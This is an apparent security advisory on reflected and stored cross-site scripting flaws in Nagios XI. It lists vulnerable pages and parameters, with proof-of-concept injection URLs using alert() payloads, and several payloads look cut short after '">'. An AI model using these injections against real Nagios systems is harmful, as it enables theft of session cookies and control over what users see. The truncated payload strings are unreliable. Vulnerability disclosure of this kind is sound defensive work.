source: www.securityfocus.com/bid/51069/info Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Nagios XI versions prior to 2011R1.9 are vulnerable. Reflected XSS ----- Page: /nagiosxi/login.php Variables: - PoCs: http://site/nagiosxi/login.php/";alert('0a29');" Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe manner Also affects: /nagiosxi/about/index.php /nagiosxi/about/index.php /nagiosxi/about/main.php /nagiosxi/account/main.php /nagiosxi/account/notifymethods.php /nagiosxi/account/notifymsgs.php /nagiosxi/account/notifyprefs.php /nagiosxi/account/testnotification.php /nagiosxi/help/index.php /nagiosxi/help/main.php /nagiosxi/includes/components/alertstream/go.php /nagiosxi/includes/components/alertstream/index.php /nagiosxi/includes/components/hypermap_replay/index.php /nagiosxi/includes/components/massacknowledge/mass_ack.php /nagiosxi/includes/components/xicore/recurringdowntime.php/ /nagiosxi/includes/components/xicore/status.php /nagiosxi/includes/components/xicore/tac.php /nagiosxi/reports/alertheatmap.php /nagiosxi/reports/availability.php /nagiosxi/reports/eventlog.php /nagiosxi/reports/histogram.php /nagiosxi/reports/index.php /nagiosxi/reports/myreports.php /nagiosxi/reports/nagioscorereports.php /nagiosxi/reports/notifications.php /nagiosxi/reports/statehistory.php /nagiosxi/reports/topalertproducers.php /nagiosxi/views/index.php /nagiosxi/views/main.php Page: /nagiosxi/account/ Variables: xiwindow PoCs: http://site/nagiosxi/account/?xiwindow="> Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php Variables: - PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'> Page: /nagiosxi/includes/components/xicore/status.php Variables: hostgroup, style PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='> http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=> Page: /nagiosxi/includes/components/xicore/recurringdowntime.php Variables: - PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29') Page: /nagiosxi/reports/alertheatmap.php Variables: height, host, service, width PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="> http://site/nagiosxi/reports/alertheatmap.php?host="> http://site/nagiosxi/reports/alertheatmap.php?service="> http://site/nagiosxi/reports/alertheatmap.php?width="> Page: /nagiosxi/reports/histogram.php Variable: service PoCs: http://site/nagiosxi/reports/histogram.php?service="> Page: /nagiosxi/reports/notifications.php Variables: host, service PoCs: http://site/nagiosxi/reports/notifications.php?host="> http://site/nagiosxi/reports/notifications.php?service="> Page: /nagiosxi/reports/statehistory.php Variables: host, service PoCs: http://site/nagiosxi/reports/statehistory.php?host="> http://site/nagiosxi/reports/statehistory.php?service="> Stored XSS ----- Page: /nagiosxi/reports/myreports.php Variable: title Details: It is possible to store XSS within 'My Reports', however it is believed this is only viewable by the logged-in user. 1) View a report and save it, e.g. http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D 2) Name the report with XSS, e.g. ">